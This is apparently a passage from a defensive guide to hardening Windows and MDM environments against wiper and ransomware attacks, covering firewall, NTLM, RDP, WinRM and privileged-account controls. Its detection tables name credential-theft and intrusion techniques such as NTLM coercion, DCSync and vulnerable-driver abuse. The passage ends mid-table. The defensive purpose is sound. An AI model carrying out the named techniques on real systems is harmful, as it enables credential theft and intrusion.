Unlike ransomware, where data might be recoverable via decryption, wiper attacks aim for the permanent destruction of the Master Boot Record (MBR), GUID Partition Table (GPT), Master File Table (MFT), or overwrite the file system making endpoint devices inaccessible. 

Proactive Hardening

Enforcing strong identity and network controls for securing the management plane can prevent an attacker from gaining access to endpoint and MDM platforms and abusing intended functionality (e.g., deploying wiper scripts or issuing  "Remote Wipe" or "Factory Reset" commands).

  • Enforce strong authentication (e.g., phishing-resistant MFA, including FIDO2) for identities assigned privileged roles and functions.

  • Enforce session lifetimes, idle session timeouts and utilize device-bound session protection to protect against token replay attacks.

  • Require access policies and multi-admin approval for authorization of specific actions. 

  • Reduce long-standing administrative permissions and migrate to a Just-in-Time (JIT) or Just-Enough-Access (JEA) access model for privileged roles and actions.  

  • For Microsoft Intune, leverage a combination of role-based access control (RBAC) and scope tags to reduce the blast radius and minimize the risk of compromised privileged identities being leveraged to impact a large scope of managed devices / endpoints. 

  • Audit admin roles for anything including “Remote tasks/wipe/erase” permissions - and ensure these events are forwarded to a centralized SIEM. Additionally, reduce the scope of administrators that can perform these actions to the minimum required for business operations.

  • Reduce scope of API token permissions following the principle of least privilege. Remove or expire tokens after a period of inactivity. Rotate tokens on a regular basis.

  • For cloud-hosted MDM platforms, utilize access policies to enforce network- and location-based allow listing. For local/on-premises MDM servers, utilize firewalls to restrict access to MDM infrastructure (management plane).

  • If supported, configure wipe protection to prevent against mass device wiping within a specific threshold.  An example of this configuration within the Omnissa Workspace ONE platform is available here.

  • Review existing scripts and configuration profiles deployed via the MDM platform to identify and remediate any hardcoded plain text passwords, API keys, or other sensitive secrets.

Detection Opportunities for Securing Endpoint and Mobile Device Management Platforms

Use Case

MITRE ID

Description

Remote Wipe or Factory Reset Command Issued

T1485 - Data Destruction

Monitor endpoint management platform audit logs for issuance of remote wipe, factory reset, or retire commands. 

Alert on any wipe command targeting more than a threshold number of devices within a defined time window, or wipe commands issued outside approved change windows.

Anomalous MDM/EDR Administrator Authentication

T1078.004 - Valid accounts: Cloud accounts

Monitor authentication logs for endpoint management platform admin consoles for sign-ins from unrecognized IPs, non-compliant devices, or locations inconsistent with the administrator’s historical access pattern. 

Alert on admin authentication that bypasses Conditional Access or lacks phishing-resistant MFA.

Bulk Script or Configuration Profile Deployment

T1072 - Software Deployment Tools

Monitor of mass deployment of new scripts, configuration profiles, or software packages pushed to device groups via the management platform.

 Alert when a deployment targets all devices or broad scope tags rather than specific groups, particularly when initiated by an account that has not previously performed bulk deployments.

Administrative Role or Permission Modification

T1098 - Account Manipulation

Monitor platform audit logs for changes to administrative roles, RBAC assignments, or scope tag modifications.

 Alert on elevation of accounts to roles with remote task, wipe, or retire permissions, and on removal of multi-admin approval requirements.

API Key creation or Anomalous API access

T1098.001 - Additional Cloud Credentials

Monitor for creation of new API keys, tokens, or service principal credentials for the endpoint management platform. 

Alert on API calls from previously unseen source IPs or user-agents, and on API activity outside business hours. 

Management Platform Audit Log Tampering or Disablement

T1562.008 - Impair Defenses: Disable or Modify Cloud Logs

Monitor for modifications to the platform’s audit logging configuration, including disablement of change management logging, redirection of syslog export destinations, or deletion of audit log entries. 

Alert on changes to log retention settings or export configurations.

3. On-Premises Lateral Movement Protections

Endpoint Hardening

Windows Firewall Configurations

Once initial access to on-premises infrastructure is established, threat actors will conduct lateral movement to attempt to further expand the scope of access and persistence. To protect Windows endpoints from being accessed using common lateral movement techniques, a Windows Firewall policy can be configured to restrict the scope of communications permitted between endpoints within an environment. A Windows Firewall policy can be enforced locally or centrally as part of a Group Policy Object (GPO) configuration. At a minimum, the common ports and protocols leveraged for lateral movement that should be blocked between workstation-to-workstation and workstations to non-domain controllers and non-file servers include:

  • SMB (TCP/445, TCP/135, TCP/139)

  • Remote Desktop Protocol (TCP/3389)

  • Windows Remote Management (WinRM)/Remote PowerShell (TCP/80, TCP/5985, TCP/5986)

  • Windows Management Instrumentation (WMI) (dynamic port range assigned through Distributed Component Object Model (DCOM))

Using a GPO (Figure 5), the settings listed in Table 11 can be configured for the Windows Firewall to control inbound communications to endpoints in a managed environment. The referenced settings will effectively block all inbound connections for the Private and Public profiles, and for the Domain profile, only allow connections that do not match a predefined block rule.

Computer Configuration > Policies > Windows Settings > Security Settings > Windows Firewall with Advanced Security

Figure 5: GPO path for creating Windows Firewall rules

Profile Setting

Firewall State

Inbound Connections

Log Dropped Packets

Log Successful Connections

Log File Path

Log File Maximum Size (KB)

Domain

On

Allow

Yes

Yes

%systemroot%\system32\LogFiles\Firewall\pfirewall.log

4,096

Private

On

Block All Connections

Yes

Yes

%systemroot%\system32\LogFiles\Firewall\pfirewall.log

4,096

Public

On

Block All Connections

Yes

Yes

%systemroot%\system32\LogFiles\Firewall\pfirewall.log

4,096

Table 11: Windows Firewall recommended configuration state
Windows Firewall Recommendation Configurations

Figure 6: Windows Firewall recommendation configurations

Additionally, to ensure that only centrally managed firewall rules are enforced (and cannot be overridden by a threat actor), the settings for Apply local firewall rules and Apply local connection security rules can be set to No for all profiles.

Windows Firewall Domain Profile Customized Settings

Figure 7: Windows Firewall domain profile customized settings

To quickly contain and isolate systems, the centralized Windows Firewall setting of Block all connections (Figure 8) will prevent any inbound connections from being established to a system. This is a setting that can be enforced on workstations and laptops, but will likely impact operations if enforced for servers, although if there is evidence of an active threat actor lateral pivoting within an environment, it may be a necessary step for rapid containment.

Note: If this control is being used temporarily to facilitate containment as part of an active incident, once the incident has been contained and it has been deemed safe to re-establish connectivity among systems within an environment, the Inbound Connections setting can be changed back to Allow using a GPO.

Windows Firewall - Block All Connections Settings

Figure 8: Windows Firewall - Block All Connections settings

If blocking all inbound connectivity for endpoints during a containment event is not practical, or for the Domain profile configurations, at a minimum, the protocols listed in Table 12 should be enforced using either a GPO or via the commands referenced within the table.

For any specific applications that may require inbound connectivity to end-user endpoints, the local firewall policy should be configured with specific IP address exceptions for origination systems that are authorized to initiate inbound connections to such devices.

Protocol/Port

Windows Firewall Rule

Command Line Enforcement

SMB

TCP/445, TCP/139, TCP/135

Predefined Rule Name:

  • File and Print Sharing

  • Remote Desktop

  • Windows Management Instrumentation (WMI)

  • Windows Remote Management

  • Windows Remote Management (Compatibility)

  • TCP/5986

netsh advfirewall firewall set rule group="File and Printer Sharing" new enable=no

Remote Desktop Protocol

TCP/3389

Predefined Rule Name:

netsh advfirewall firewall set rule group="Remote Desktop" new enable=no

WMI

Predefined Rule Name:

netsh advfirewall firewall set rule group="windows management instrumentation (wmi)" new enable=no

Windows Remote Management/PowerShell Remoting

TCP/80, TCP/5985, TCP/5986

Predefined Rule Name:

netsh advfirewall firewall set rule group="Windows Remote Management" new enable=no

Via PowerShell:

Disable-PSRemoting -Force

Table 12: Windows Firewall suggested block rules

Windows Firewall Suggested Rule Blocks via Group Policy

Figure 9: Windows Firewall suggested rule blocks via Group Policy

NTLM Authentication Configurations

Threat actors often attempt to harvest credentials (including Windows NTLMv1 hashes) based upon outbound SMB or WebDAV communications. Organizations should review NTLM settings for Windows-based endpoints, and work to harden, disable, or restrict NTLMv1 authentication requests. 

To fully restrict NTLM authentication to remote servers, the following GPO settings can be leveraged:

  • Computer Configuration > Windows Settings > Security Settings > Local Policies > Security Options > Network Security: Restrict NTLM: Outgoing NTLM traffic to remote servers 

    • Allow all

    • Audit all

    • Deny all

Note: If "Deny all" is selected, the client computer cannot authenticate (send credentials) to a remote server using NTLM authentication. Before setting to "Deny all," organizations should configure the GPO setting with the "Audit all" enforcement. With this configuration, audit and block events will be recorded within the Operational event log on endpoints (Applications and Services Log\Microsoft\Windows\NTLM).

If any recorded NTLM authentication events are required, organizations can configure the "Network security: Restrict NTLM: Add remote server exceptions for NTLM authentication" setting to define a listing of remote servers, which are required to use NTLM authentication.

Detection Opportunities for SMB, WMI, and NTLM Communications

Use Case

MITRE ID

Description

High Volume of SMB Connections

T1021.002 – SMB/Windows Admin Shares

Search for a sharp increase in SMB connections that fall outside of a normal pattern.

Outbound Connection Attempted Over SMB

T1212 – Exploitation for Credential Access

Search for external connection attempts over SMB, as this may be an attempt to harvest credential hashes.

WMI Being Used to Call a Remote Service

T1047 – Windows Management Instrumentation

Search for WMI being used via a command line or PowerShell to call a remote service for execution.

WMI Being Used for Ingress Tool Transfer

T1105 – Ingress Tool Transfer

Search for suspicious usage of WMI to download external resources. 

Forced NTLM Authentication Using SMB or WebDAV

T1187 – Forced Authentication

Search for potential NTLM authentication attempts using SMB or WebDAV.

NTLM Relay via Coercion

T1187 - Forced Authentication

Monitor for NTLM authentication attempts from Domain Controllers or privileged servers to unexpected destinations, particularly to HTTP endpoints (AD CS web enrollment). 

Detect PetitPotam by monitoring for EfsRpcOpenFileRaw calls, DFSCoerce via DFS-related named pipe access, and PrinterBug via SpoolService RPC calls.

Table 13: Detection opportunities for SMB, WMI, and NTLM communications

Remote Desktop Protocol Hardening

Remote Desktop Protocol (RDP) is a common method used by threat actors to remotely connect to systems, laterally move from the perimeter onto a larger scope of internal systems, and perform malicious activities (such as data theft or ransomware deployment). External-facing systems with RDP open to the internet present an elevated risk. Threat actors may exploit this vector to gain initial access to an organization and then perform lateral movement into the organization to complete their mission objectives.

Proactively, organizations should scan their public IP address ranges to identify systems with RDP (TCP/3389) and other protocols (SMB – TCP/445) open to the internet. At a minimum, RDP and SMB should not be directly exposed for ingress and egress access to/from the internet. If required for operational purposes, explicit controls should be implemented to restrict the source IP addresses, which can interface with systems using these protocols. The following hardening recommendations should also be implemented.

Enforce Multi-Factor Authentication

If external-facing RDP must be used for operational purposes, MFA should be enforced when connecting using this method. This can be accomplished either via the integration of a third-party MFA technology or by leveraging a Remote Desktop Gateway and Azure Multifactor Authentication Server using Remote Authentication Dial-In User Service (RADIUS).

Leverage Network-Level Authentication

For external-facing RDP servers, Network-Level Authentication (NLA) provides an extra layer of preauthentication before a connection is established. NLA can also be useful for protecting against brute-force attacks, which often target open internet-facing RDP servers.

NLA can be configured either via the user interface (UI) (Figure 10) or via Group Policy (Figure 11).

Enabling NLA via the UI

Figure 10: Enabling NLA via the UI

Using a GPO, the setting for NLA can be configured via:

  • Computer Configuration > Policies > Administrative Templates > Windows Components > Remote Desktop Services > Remote Desktop Session Host > Security > Require user authentication for remote connections by using Network Level Authentication

    • Enabled

Enabling NLA via Group Policy

Figure 11: Enabling NLA via Group Policy

Some caveats about leveraging NLA for RDP:

  • The Remote Desktop client v7.0 (or greater) must be leveraged.

  • NLA uses CredSSP to pass authentication requests on the initiating system. CredSSP stores credentials in Local Security Authority (LSA) memory on the initiating system, and these credentials may remain in memory even after a user logs off the system. This provides a potential exposure risk for credentials in memory on the source system.

  • On the RDP server, users permitted for remote access using RDP must be assigned the Access this computer from the network privilege when NLA is enforced. This privilege is often explicitly denied for user accounts to protect against lateral movement techniques.

Restrict Administrative Accounts from Leveraging RDP on Internet-Facing Systems

For external-facing RDP servers, highly privileged domain and local administrative accounts should not be permitted access to authenticate with the external-facing systems using RDP (Figure 12). 

This can be enforced using Group Policy, configurable via the following path: 

  • Computer Configuration > Policies > Windows Settings > Security Settings > Local Policies > User Rights Assignment > Deny log on through Terminal Services

Group Policy configuration for restricting highly privileged domain and local administrative accounts from leveraging RDP

Figure 12: Group Policy configuration for restricting highly privileged domain and local administrative accounts from leveraging RDP

Detection Opportunities for RDP Usage

Use Case

MITRE ID

Description

RDP Authentication Integration 

T1110 – Brute Force

T1078 – Valid Accounts

T1021.001 – Remote Desktop Protocol

Existing authentication rules should include RDP attempts. This includes use cases for:

  • Brute Force

  • Password Spraying

  • MFA Failures Single User

  • MFA Failures Single Source

  • External Authentication from an Account with Elevated Privileges

Anomalous Connection Attempts over RDP

T1078 – Valid Accounts

T1021.001 – Remote Desktop Protocol

Searching for anomalous RDP connection attempts over known RDP ports such as TCP/3389.

Table 14: Detection Opportunities for RDP Usage

Disabling Administrative/Hidden Shares

To conduct lateral movement, threat actors may attempt to identify administrative or hidden network shares, including those that are not explicitly mapped to a drive letter and use these for remotely binding to endpoints throughout an environment. As a protective or rapid containment measure, organizations may need to quickly disable default administrative or hidden shares from being accessible on endpoints. This can be accomplished by either modifying the registry, stopping a service, or by using the MSS (Legacy) Group Policy template.

Common administrative and hidden shares on endpoints include:

  • ADMIN$
  • C$
  • D$
  • IPC$

Note: Disabling administrative and hidden shares on servers, specifically including domain controllers, may significantly impact the operation and functionality of systems within a domain-based environment.

Additionally, if PsExec is used in an environment, disabling the admin (ADMIN$) share can restrict the capability for this tool to be used to remotely interface with endpoints.
Registry Method

Using the registry, administrative and hidden shares can be disabled on endpoints (Figure 13 and Figure 14).

Workstations
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters
DWORD Name = "AutoShareWks"
Value = "0"

Figure 13: Registry value disabling administrative shares on workstations

Servers
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters
DWORD Name = "AutoShareServer"
Value = "0"

Figure 14: Registry value disabling administrative shares on servers

Service Method

By stopping the Server service on an endpoint, the ability to access any shares hosted on the endpoint will be disabled (Figure 15).

Server service properties

Figure 15: Server service properties

Group Policy Method

Using the MSS (Legacy) Group Policy template, administrative and hidden shares can be disabled on either a server or workstation via a GPO setting (Figure 16).

  • Computer Configuration > Policies > Administrative Templates > MSS (Legacy) > MSS (AutoShareServer)

    • Disabled

  • Computer Configuration > Policies > Administrative Templates > MSS (Legacy) > MSS (AutoShareWks)

    • Disabled

Disabling Administrative And Hidden Shares via the MSS (Legacy) Group Policy Template

Figure 16: Disabling administrative and hidden shares via the MSS (Legacy) Group Policy template

Detection Opportunities for Accessing Administrative or Hidden Shares

Use Case

MITRE ID

Description

Network Discovery: Suspicious Usage of the Net Command

T1049 - System Network Connections Discovery

T1135 - Network Share Discovery

Search for suspicious use of the net command to enumerate systems and file shares within an environment.

Table 15: Detection opportunities for accessing administrative or hidden shares

Hardening Windows Remote Management

Threat actors may leverage Windows Remote Management (WinRM) to laterally move throughout an environment. WinRM is enabled by default on all Windows Server operating systems (since Windows Server 2012 and above), but disabled on all client operating systems (Windows 7 and Windows 10) and older server platforms (Windows Server 2008 R2).

PowerShell remoting (PS remoting) is a native Windows remote command execution feature that is built on top of the WinRM protocol.

Windows client (nonserver) operating system platforms where WinRM is disabled indicates that there is:

  • No WinRM listener configured

  • No Windows firewall exception configured

By default, WinRM uses TCP/5985 and TCP/5986, which can be either disabled using the Windows Firewall or configured so that a specific subset of IP addresses can be authorized for connecting to endpoints using WinRM.

WinRM and PowerShell remoting can be explicitly disabled on endpoint using either a PowerShell command (Figure 17) or specific GPO settings.

PowerShell
Disable-PSRemoting -Force

Figure 17: PowerShell command to disable WinRM/PowerShell remoting on an endpoint

Note: Running Disable-PSRemoting -Force does not prevent local users from creating PowerShell sessions on the local computer or for sessions destined for remote computers.

After running the command, the message recorded in Figure 18 will be displayed. These steps provide additional hardening, but after running the Disable-PSRemoting -Force command, PowerShell sessions destined for the target endpoint will not be successful.

Warning message after disabling PSRemoting

Figure 18: Warning message after disabling PSRemoting

To enforce the additional steps for disabling WinRM via PowerShell (Figure 19 through Figure 22):

  1. Stop and disable the WinRM service.

    Stop-Service WinRM -PassThruSet-Service WinRM -StartupType Disabled

    Figure 19: PowerShell command to stop and disable the WinRM service


  2. Disable the listener that accepts requests on any IP address.

    dir wsman:\localhost\listener
    
    Remove-Item -Path WSMan:\Localhost\listener\<Listener name>

    Figure 20: PowerShell commands to delete a WSMan listener


  3. Disable the firewall exceptions for WS-Management communications.

    Set-NetFirewallRule -DisplayName 'Windows Remote Management (HTTP-In)' -Enabled False 

    Figure 21: PowerShell command to disable firewall exceptions for WinRM


  4. Restore the value of the LocalAccountTokenFilterPolicy to 0, which restricts remote access to members of the Administrators group on the computer.

    Set-ItemProperty -Path HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system -Name LocalAccountTokenFilterPolicy -Value 0

    Figure 22: PowerShell command to configure the registry key for LocalAccountTokenFilterPolicy

Group Policy
  • Computer Configuration > Policies > Administrative Templates > Windows Components > Windows Remote Management (WinRM) > WinRM Service > Allow remote server management through WinRM

    • Disabled

If this setting is configured as Disabled, the WinRM service will not respond to requests from a remote computer, regardless of whether any WinRM listeners are configured.

  • Computer Configuration > Policies > Administrative Templates > Windows Components > Windows Remote Shell > Allow Remote Shell Access 

    • Disabled

This policy setting will manage the configuration of remote access to all supported shells to execute scripts and commands.

Detection Opportunities for WinRM Usage

Use Case

MITRE ID

Description

Unauthorized WinRM Execution Attempt

T1021.006 - Remote Services: Windows Remote Management

Search for command execution attempts for WinRM on a system where WinRM has been disabled.

Suspicious Process Creation Using WinRM

T1021.006 - Remote Services: Windows Remote Management

Search for anomalous process creation events using WinRM that deviate from an established baseline.

Suspicious Network Connection Using WinRM

T1021.006 - Remote Services: Windows Remote Management

Search for network activity over known WinRM ports, such as TCP/5985 and TCP/5986, to identify anomalous connections that deviate from an established baseline.

Remote WMI Connection Using WinRM

T1021.006 - Remote Services: Windows Remote Management

Search for remote WMI connection attempts using WinRM. 

Table 16: Detection opportunities for WinRM use

Restricting Common Lateral Movement Tools and Methods

Table 17 provides a consolidated summary of security configurations that can be leveraged to combat against common remote access tools and methods used for lateral movement within environments.

Tool/Tactic

Mitigating Security Configurations (Target Endpoints)

PsExec (using the current logged-on user account, without the -u switch)

If the -u switch is not leveraged, authentication will use Kerberos or NTLM for the current logged-on user of the source endpoint and will register as a Type 3 (network) logon on the destination endpoint.

PsExec high-level functionality:

  • Connects to the hidden ADMIN$ share (mapping to the C:\Windows folder) on a remote endpoint via SMB (TCP/445).

  • Uses the Service Control Manager (SCM) to start the PSExecsvc service and enable a named pipe on a remote endpoint.

  • Input/output redirection for the console is achieved via the created named pipe.

Option 1:

GPO configuration:

  • Computer Configuration > Policies > Windows Settings > Security Settings > Local Policies > User Rights Assignment

  • Deny access to this computer from the network

  • Deny access to this computer from the network

  • Deny log on locally

  • Deny log on through Terminal Services

  • DCOM:Machine Launch Restrictions in Security Descriptor Definition Language (SDDL) Syntax

  • Computer Configuration > Policies > Windows Settings > Local Policies > Security Options

  • DCOM:Machine Access Restrictions in Security Descriptor Definition Language (SDDL) Syntax

  • Deny access to this computer from the network

Option 2: 

Windows Firewall rule:

netsh advfirewall firewall set rule group="File and Printer Sharing" new enable=no

Figure 23: PowerShell command to disable inbound file and print sharing (SMB) for an endpoint using a local Windows Firewall rule

Option 3:

Disable administrative and hidden shares.

PsExec (with Alternative Credentials, via the -u switch)

If the -u switch is leveraged, authentication will use the alternate supplied credentials and will register as a Type 3 (network) and Type 2 (interactive) logon on the destination endpoint.

Option 1:

GPO configuration:

  • Computer Configuration > Policies > Windows Settings > Security Settings > Local Policies > User Rights Assignment

Option 2:

Windows Firewall rule:

netsh advfirewall firewall set rule group="File and Printer Sharing" new enable=no

Figure 24: PowerShell command to disable inbound file and print sharing (SMB) for an endpoint using a local Windows Firewall rule

Remote Desktop Protocol (RDP)

Option 1:

GPO configuration:

  • Computer Configuration > Policies > Windows Settings > Security Settings > Local Policies > User Rights Assignment

Option 2:

Windows Firewall rule:

netsh advfirewall firewall set rule group="Remote Desktop" new enable=no

Figure 25: PowerShell command to disable inbound Remote Desktop (RDP) for an endpoint using a local Windows Firewall rule

PS remoting and WinRM

Option 1:

PowerShell command:

Disable-PSRemoting -Force

Figure 26: PowerShell command to disable PowerShell remoting for an endpoint

Option 2:

GPO configuration:

  • Computer Configuration > Policies > Administrative Templates > Windows Components > Windows Remote Management (WinRM) > WinRM Service > Allow remote server management through WinRM

Option 3:

Windows Firewall rule:

netsh advfirewall firewall set rule group="Windows Remote Management" new enable=no

Figure 27: PowerShell command to disable inbound WinRM for an endpoint using a local Windows Firewall rule

Distributed Component Object Model (DCOM)

Option 1:

GPO configuration:

  • Computer Configuration > Policies > Windows Settings > Local Policies > Security Options

Both of these settings allow an organization to define additional computer-wide controls that govern access to all DCOM–based applications on an endpoint.

When users or groups that are provided permissions are specified, the security descriptor field is populated with the SDDL representation of those groups and privileges.

Users and groups can be given explicit Allow or Deny privileges for both local and remote access using DCOM.

Option 2:

Windows Firewall rules:

netsh advfirewall firewall set rule group="COM+ Network Access" new enable=no

netsh advfirewall firewall set rule group="COM+ Remote Administration" new enable=no

Figure 28: PowerShell commands to disable inbound DCOM for an endpoint using a local Windows Firewall rule

Third-party remote access applications (e.g., VNC/DameWare/ScreenConnect) that rely upon specific interactive and remote logon permissions being configured on an endpoint.

GPO configuration:

  • Computer Configuration > Policies > Windows Settings > Security Settings > Local Policies > User Rights Assignment

Table 17: Common lateral movement tools/methods and mitigating security controls

Detection Opportunities for Common Lateral Movement Tools and Methods

Use Case

MITRE

Description

Anomalous PsExec Usage

T1569.002 – System Services: Service Execution

T1021.002 – Remote Services: SMB/Windows Admin Shares

T1570 – Lateral Tool Transfer

Search for attempted execution of PsExec on systems where PsExec is disabled or where it deviates from normal activity.

Process Creation Event Involving a COM Object by Different User

T1021.003 – Remote Services: Distributed Component Object Model

T1078 – Valid Accounts

Search for process creation events including COM objects that are initiated by an account that is not currently the logged-in user for the system.

High Volume of DCOM-Related Activity

T1021.003 – Remote Services: Distributed Component Object Model

Search for a sharp increase in volume of DCOM-related activity. 

Third-Party Remote Access Applications

T1219 – Remote Access Software

Search for anomalous use of third-party remote access applications. This type of activity could indicate a threat actor is attempting to use third-party remote access applications as an alternate communication channel or for creating remote interactive sessions.

BYOVD - EDR/AV Tampering via Vulnerable Drivers

T1068 - Exploitation for Privilege Escalation

T1562.001 - Impair Defenses

Monitor for kernel driver installations (Sysmon Event ID 6) where the loaded driver hash matches known vulnerable drivers from the LOLDrivers project.

Alert on new service creation (Event ID 7045) loading .sys files from user-writable paths (e.g., %TEMP%, %APPDATA%). 

RMM Tool Abuse for Lateral Movement

T1219 - Remote Access Tools

Monitor for installation or execution of legitimate RMM tools (ScreenConnect/ConnectWise, AnyDesk, Atera, Splashtop, TeamViewer) that are not part of the organization's approved toolset.

Monitor for new service installations matching known RMM tool signatures.

Table 18: Detection opportunities for common lateral movement tools and methods

Additional Endpoint Hardening

To help protect against malicious binaries, malware, and encryptors being invoked on endpoints, additional security hardening technologies and controls should be considered. Examples of additional security controls for consideration for Windows-based endpoints are provided as follows.

Windows Defender Application Control

Windows Defender Application Control is a set of inherent configuration settings within Active Directory that provide lockdown and control mechanisms for controlling which applications and files users can run on endpoints. With this functionality, the following types of rules can be configured within GPOs:

  • Publisher rules: Can be leveraged to allow or restrict execution of files based upon digital signatures and other attributes

  • Path rules: Can be leveraged to allow or restrict file execution or access based upon files residing in specific path

  • File hash rules: Can be leveraged to allow or restrict file execution based on a file's hash

Additional information related to Windows Defender Application Control.

Microsoft Defender Attack Surface Reduction

Microsoft Defender Attack Surface Reduction (ASR) rules can help protect against various threats, including:

  • A threat actor launching executable files and scripts that attempt to download or run files

  • A threat actor running obfuscated or suspicious scripts

  • A threat actor invoking credential theft tools that interface with Local Security Authority Subsystem Service (LSASS)

  • A threat actor invoking PsExec or WMI commands

  • Normalizing and blocking behaviors that applications do not usually initiate as part of standardized activity

  • Blocking executable content from email clients and web mail (phishing)

ASR requires a Windows E3 license or above. A Windows E5 license provides advanced management capabilities for ASR.

Additional information related to Microsoft Defender Attack Surface Reduction functionality.

Controlled Folder Access

Controlled folder access can help protect data from being encrypted by ransomware. Beginning with Windows 10 version 1709+ and Windows Server 2019+, controlled folder access was introduced within Windows Defender Antivirus (as part of Windows Defender Exploit Guard). 

Once controlled folder access is enabled, applications and executable files are assessed by Windows Defender Antivirus, which then determines if an application is malicious or safe. If an application is determined to be malicious or suspicious, it will be blocked from making changes to any files in a protected folder.

Once enabled, controlled folder access will apply to a number of system folders and default locations, including:

  • Documents
    • C:\users\<username>\Documents
    • C:\users\Public\Documents
  • Pictures
    • C:\users\<username>\Pictures
    • C:\users\Public\Pictures
  • Videos
    • C:\users\<username>\Videos
    • C:\users\Public\Videos
  • Music
    • C:\users\<username>\Music
    • C:\users\Public\Music
  • Desktop
    • C:\users\<username>\Desktop
    • C:\users\Public\Desktop
  • Favorites
    • C:\users\<username>\Favorites

Additional folders can be added using the Windows Security application, Group Policy, PowerShell, or mobile device management (MDM) configuration service providers (CSPs). Additionally, applications can be allow-listed for access to protected folders.

Note: For controlled folder access to fully function, Windows Defender's Real Time Protection setting must be enabled.

Additional information related to controlled folder access.

Tamper Protection

Threat actors will often attempt to disable security features on endpoints. Tamper protection either in Windows (via Microsoft Defender for Endpoint) or integrated within third-party AV/EDR platforms can help protect security tools from being modified or stopped by a threat actor. Organizations should review the configuration of security technologies that are deployed to endpoints and verify if tamper protection is (or can be) enabled to protect against unauthorized modification. Once implemented, organizations should test and validate that the tamper protection controls behave as expected as different products offer different levels of protection.

Additional information related to tamper protection for Windows Defender for Endpoint.

Detection Opportunities for Tamper Protection Events

Use Case

MITRE

Description

Threat Actor Attempting to Disable Security Tooling on an Endpoint

T1562.001 - Disable or Modify Tools

Monitor for evidence of processes or command-line arguments correlating to security tools/services being stopped.

Table 19: Detection opportunities for tamper protection events

4. Credential Exposure and Account Protections

Identification of Privileged Accounts and Groups

Threat actors will prioritize identifying privileged accounts as part of reconnaissance efforts. Once identified, threat actors will attempt to obtain credentials for these accounts for lateral movement, persistence, and mission fulfillment.

Organizations should proactively focus on identifying and reviewing the scope of accounts and groups within Active Directory that have an elevated level of privilege. An elevated level of privilege can be determined by the following criteria:

  • Accounts or nested groups that are assigned membership into default domain and Exchange-based privileged groups (Figure 29)

  • Accounts or nested groups that are assigned membership into security groups protected by AdminSDHolder

  • Accounts or groups assigned permissions for organizational units (OUs) housing privileged accounts, groups, or endpoints

  • Accounts or groups assigned specific extended right permissions either directly at the root of the domain or for OUs where permissions are inherited by child objects. Examples include:

    • DS-Replication-Get-Changes-All
    • Administer Exchange Information Store
    • View Exchange Information Store Status
    • Create-Inbound-Forest-Trust
    • Migrate-SID-History
    • Reanimate-Tombstones
    • View Exchange Information Store Status
    • User-Force-Change-Password
  • Accounts or groups assigned permissions for modifying or linking GPOs

  • Accounts or groups assigned explicit permissions on domain controllers or Tier 0 endpoints

  • Accounts or groups assigned directory service replication permissions

  • Accounts or groups with local administrative access on all endpoints (or a large scope of critical assets) in a domain

To identify accounts that are provided membership into default domain-based privileged groups or are protected by AdminSDHolder, the following PowerShell cmdlets can be run from a domain controller.

get-ADGroupMember -Identity "Domain Admins" -Recursive | export-csv -path <output directory>\DomainAdmins.csv -NoTypeInformation 

get-ADGroupMember -Identity "Enterprise Admins" -Recursive | export-csv -path <output directory>\EnterpriseAdmins.csv -NoTypeInformation 

get-ADGroupMember -Identity "Schema Admins" -Recursive | export-csv -path <output directory>\SchemaAdmins.csv -NoTypeInformation

get-ADGroupMember -Identity "Administrators" -Recursive | export-csv -path <output directory>\Administrators.csv -NoTypeInformation 

get-ADGroupMember -Identity "Account Operators" -Recursive | export-csv -path <output directory>\AccountOperators.csv -NoTypeInformation 

get-ADGroupMember -Identity "Backup Operators" -Recursive | export-csv -path <output directory>\BackupOperators.csv -NoTypeInformation 

get-ADGroupMember -Identity "Cert Publishers" -Recursive | export-csv -path <output directory>\CertPublishers.csv -NoTypeInformation 

get-ADGroupMember -Identity "Print Operators" -Recursive | export-csv -path <output directory>\PrintOperators.csv -NoTypeInformation 

get-ADGroupMember -Identity "Server Operators" -Recursive | export-csv -path <output directory>\ServerOperators.csv -NoTypeInformation 

get-ADGroupMember -Identity "DNSAdmins" -Recursive | export-csv -path <output directory>\DNSAdmins.csv -NoTypeInformation 

get-ADGroupMember -Identity "Group Policy Creator Owners" -Recursive | export-csv -path <output directory>\Group-Policy-Creator-Owners.csv -NoTypeInformation 

get-ADGroupMember -Identity "Exchange Trusted Subsystem" -Recursive | export-csv -path <output directory>\Exchange-Trusted-Subsystem.csv -NoTypeInformation

get-ADGroupMember -Identity "Exchange Windows Permissions" -Recursive | export-csv -path <output directory>\Exchange-Windows-Permissions.csv -NoTypeInformation 

get-ADGroupMember -Identity "Exchange Recipient Administrators" -Recursive | export-csv -path <output directory>\Exchange-Recipient-Admins.csv -NoTypeInformation 

get-ADUser -Filter {(AdminCount -eq 1) -And (Enabled -eq $True)} | Select-Object Name, DistinguishedName | export-csv -path <output directory>\AdminSDHolder_Enabled.csv

Figure 29: Commands to identify domain and exchange-based privileged accounts

Any privileged accounts granted membership into additional security groups can provide a threat actor with a potential path to domain administration-level permissions based upon endpoints where the accounts have permissions to log on or remotely access systems.

Ideally, only a small scope of accounts should be provided with highly privileged access within a domain. Accounts with highly privileged permissions should not be leveraged for daily use; used for interactive or remote logons to workstations, laptops, or common servers; or used for performing functions on non-domain controller (Tier 0) assets.For additional recommendations for restricting access for privileged accounts, reference the Privileged Account Logon Restrictions section of this blog post.

Detection Opportunities for Privileged Accounts, Groups, and GPO Modifications

Use Case

MITRE

Description

Interactive or Remote Logon of a Highly Privileged Account to an Unauthorized System

T1078 – Valid Accounts

Search for logon attempts correlating to highly privileged accounts authenticating to systems that reside outside of the Tier 0 layer.

Privileged Account and Group Discovery

T1069 – Permission Groups Discovery

T1078 – Valid Accounts

Search for command-line events where a user is attempting to enumerate privileged accounts and groups.

Account Added to Highly Privileged Group

T1078 – Valid Accounts

T1098 – Account Manipulation

Identify when accounts are added to highly privileged groups. While this can occur as part of normal activity, it should be infrequent and limited to specific accounts.

Modification of Group Policy Objects

T1484.001 – Domain Policy Modification: Group Policy Modification

Identify when GPOs are created or modified.

GPOs can also be exported and reviewed to identify last modification timestamps.

get-gpo -all | export-csv -path "c:\temp\gpo-listing-all.csv" -NoTypeInformation

Figure 30: PowerShell cmdlet to export and review GPO creation and modification timestamps

DCSync Attack

T1003.006 - OS Credential Dumping

Monitor for non-domain-controller sources issuing directory replication requests (DS-Replication-Get-Changes and DS-Replication-Get-Changes-All). 

